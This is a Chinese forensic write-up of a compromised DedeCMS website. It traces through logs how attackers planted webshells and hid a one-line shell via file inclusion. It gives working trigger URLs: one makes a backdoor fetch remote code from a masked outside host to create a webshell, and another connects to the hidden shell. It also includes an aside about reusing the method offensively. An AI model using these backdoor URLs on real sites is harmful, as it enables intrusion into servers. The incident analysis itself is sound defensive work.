1. 事件简述

用户发现网站被百度提示页面部分已被非法篡改。

1.jpg

通过查看百度快照,发现网站首页确实被篡改,插入内容被编码,通过站长工具http://tool.chinaz.com/tools/urlencode.aspx解码内容如下

2.jpg

从上可确认,网站确实存在页面篡改情况。

2. 排查过程
首先登录宝塔,发现网站首页篡改时间为 10 月 6 号

3.jpg

通过对日志进行分析发现攻击者通过 test.php 写入 optimized.php 后门,写
入时间为 06/Oct/2019:13:01:36

test.php 写入时间为 2019 年 10 月 6 号

4.jpg

test.php 具体内容如下,可利用该后门通过访问如下链接

5.jpg

//plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt,生成 optimized.php 大马,访
问 optimized.php,输入密码可成功登录该木马程序,这也可做为我们日后攻击写马的方法

6.jpg

在对日志进行进一步分析,来确定 test.php 是如何写进服务器。开始在日志中发现了如下记录 ,这个明显是利用了dedecms的getshell漏洞

7.jpg

发现这个解码之后并不是 test.php 内容,解码内容如下

8.jpg

在日志中还看到了攻击者还尝试紧接着对 moon.php 做了一次请求,结果由于没有写
进去,系统返回了 404。

9.jpg

接着又存在一条,看状态码是写入成功了

10.jpg

解码内容如下

111.jpg

从日志中可看到在写入成功后紧接着进行了一次访问

11.jpg

但我尝试访问时,发现 mytag_js.php 文件已经被删除, 通过分析查找,在 Data /cache 目录下发现 mytag-511348.html,最早的写入时间可以追溯到 2017 年。

12.jpg

打开该文件内容为含有 php 一句话菜刀马的 html 页面 

13.jpg

含有一句话木马的 html,一个 html 能有干啥呢?继续分析日志有关于 511348 的访问记录。 

14.jpg

单独的html页面还不足以成为后门,但是通过结合mytag_js.php文件就有了大用处,通过查看源码未发现 mytag_js.php 文件,从日志中也可看到之后在对 mytag_js.php 进行访问,服务器就已经响应 404 了,可见攻击者已经删除了该文件。从之前的源码备份找到了 mytag_js.php,具体内容如下

15.jpg

攻击者只需要访问 http:// x.x.x.x /plus/mytag_js.php?aid=511348,就可以连接一句话木马了,本地搭建环境测试了下确实可以利用菜刀连接上,从日志中也可以看到确实能连接成功,从数据包的大小,可看到攻击者利用该菜刀马做了一系列操作POST的数据包都是返回的200

此处攻击者巧妙的利用文件包含的方式隐藏后门, 到此为止就是要进一步排查 mytag-511348.html 是如何被写入的,接着日志分析,当对日志追踪到 9 月 29 中午 12:35:58 分,在做进一步分析时,未发现 29/Sep/2019:11:08:32到 12/Jul/2019:09:40:01 之间的日志,所以最终也无法确定是通过什么方式上传的第一个恶意文件。由于采用了 DedeCMSV57_UTF8_SP2© 2004-2011 版本,只能从日志中判断出是利用织梦的漏洞对系统实施攻击。 另外在 data 目录下 tplcache 目录中还发现了其他的 php 一句话木马 ,最早的时间基本都可以追溯到 17 年